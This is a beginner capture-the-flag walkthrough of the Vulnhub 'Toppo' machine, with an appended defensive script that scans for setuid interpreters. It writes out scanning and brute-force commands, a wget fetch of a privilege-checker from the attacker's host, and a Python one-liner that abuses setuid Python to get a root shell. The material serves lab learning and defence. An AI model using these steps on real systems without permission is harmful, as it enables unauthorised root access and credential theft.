Vulnhub Toppo Walkthrough

Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.

I started off by running a typical nmap scan (nmap -sV -sC -v 192.168.2.92 -oN map1). It has SSH and port 80 open. Let’s check out the web page.

Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.

Running gobuster provides us with an interesting admin directory.

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.92

In the admin directory are some notes.

The notes give us the user name and password for something. Let’s try it out on SSH.

SSH worked!

Checking some basics like the bash history and sudo permissions doesn’t yield anything. So I used wget to bring over linuxprivchecker.py and ran it.

python -m SimpleHTTPServer 80

wget 192.168.2.30/linuxprivchecker.py

When running the script something interesting happened. It said I was already root.

What’s happening here is that python runs as root. This means that if we spawn a shell with python, we can be root too.

python -c 'import pty; pty.spawn("/bin/bash")'

Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn’t we get a root shell? Something’s not right. Let’s try it again with sh.

Ok that worked. Now we’re root. It looks like bash will always run under the context of the ted user, but sh works normally. Now we can get the flag.

That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.
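
A defender-side check for the misconfiguration this box relies on, as an added example that is not part of the original writeup. It assumes Python runs as root here because the interpreter binary carries the setuid bit (the page does not state the cause); the interpreter name list and the function names are illustrative.

```python
#!/usr/bin/env python3
"""Audit a directory tree for setuid files, flagging script interpreters."""
import os
import stat
import sys

# Assumed, illustrative list of interpreter name prefixes; extend as needed.
INTERPRETER_PREFIXES = ("python", "perl", "ruby", "php", "lua",
                        "node", "awk", "mawk", "gawk")


def classify(name, owner_uid):
    """Rate one setuid file by its name and owner."""
    if name.lower().startswith(INTERPRETER_PREFIXES):
        # A setuid interpreter runs any script or -c one-liner as its owner.
        return "critical" if owner_uid == 0 else "high"
    return "review"  # compare against the distribution's expected setuid list


def find_setuid_files(root):
    """Return sorted (path, owner_uid, mode_string, rating) for setuid regular files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue  # vanished or unreadable entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                findings.append((path, st.st_uid, stat.filemode(st.st_mode),
                                 classify(name, st.st_uid)))
    return sorted(findings)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr"
    for path, uid, mode, rating in find_setuid_files(target):
        print(f"{rating:8} {mode} uid={uid} {path}")
```

Anything rated critical should have the bit removed with chmod u-s unless there is a documented reason for it.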

If you’d like to see a video walkthrough with the python reverse shell, you can find it here.

Hope you found this helpful.

-R3a50n
